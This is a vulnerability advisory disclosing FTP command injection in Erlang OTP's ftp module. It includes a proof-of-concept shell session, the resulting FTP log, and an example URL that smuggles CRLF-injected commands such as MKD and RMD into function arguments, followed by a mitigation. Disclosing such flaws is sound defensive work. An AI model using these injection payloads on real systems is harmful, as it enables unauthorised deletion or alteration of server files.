Erlang OTP ftp module FTP Command Injection

Hi,

This has been reported to erlang-bugs mailing list:
http://erlang.org/pipermail/erlang-bugs/2014-January/003998.html

There is an FTP Command Injection vulnerability in the "ftp" module.

All those functions that write any string argument in the control
socket seem to be vulnerable:

user/3
user/4
account/2
cd/2
ls/2
nlist/2
rename/3
delete/2
mkdir/2
rmdir/2
recv/2
recv/3
recv_bin/2,
recv_chunk_start/2
send/3
send_bin/3
send_chunk_start/2
append_chunk_start/2
append/2
append/3
append_bin/3

Vulnerability Description
-------------------------

By injecting a \r\n sequence followed by a new command in a function
argument you get the ftp module to write the whole string in the
socket.

E.g. the following erlang shell session:

1> inets:start().
ok
2> {ok, Pid} = inets:start(ftpc, [{host, "127.0.0.1"}]).
{ok,<0.46.0>}
3> ftp:user(Pid, "anonymous", "password\r\nCWD pub\r\nMKD new_dir").
ok
4> ftp:cd(Pid, "/pub\r\nRMD new_dir\r\nPASV").
ok


Generates the following FTP session:

FTP command: Client "127.0.0.1", "USER anonymous"
FTP response: Client "127.0.0.1", "331 Please specify the password."
FTP command: Client "127.0.0.1", "PASS <password>"
FTP response: Client "127.0.0.1", "230 Login successful."
FTP command: Client "127.0.0.1", "CWD pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "MKD new_dir"
FTP response: Client "127.0.0.1", "257 "/pub/new_dir" created"
FTP command: Client "127.0.0.1", "CWD /pub"
FTP response: Client "127.0.0.1", "250 Directory successfully changed."
FTP command: Client "127.0.0.1", "RMD new_dir"
FTP response: Client "127.0.0.1", "250 Remove directory operation successful."
FTP command: Client "127.0.0.1", "PASV"
FTP response: Client "127.0.0.1", "227 Entering Passive Mode
(127,0,0,1,130,161)."


Attack Scenario Example
-----------------------

A web server allow users to navigate and download documents.
Internally the web server connects to a private ftp server using OTP
"ftp" module.
An attacker might take advantage of the vulnerability to execute
actions that aren't supposed to be exposed. E.g. delete a directory by
requesting:

http://www.example.com/list_dir.yaws?dir=/docs/%0d%0aRMD+/docs

Tested on
---------
 - Erlang OTP: R15B03
 - Ubuntu 12.04 x86_64
 - FTP Sever: vsftpd


Mitigation
----------

Until this is fixed and the proper sanitization is implemented within
the ftp module, string arguments should get "\r" and "\n" removed
before being passed to these functions.


Sebastin Tello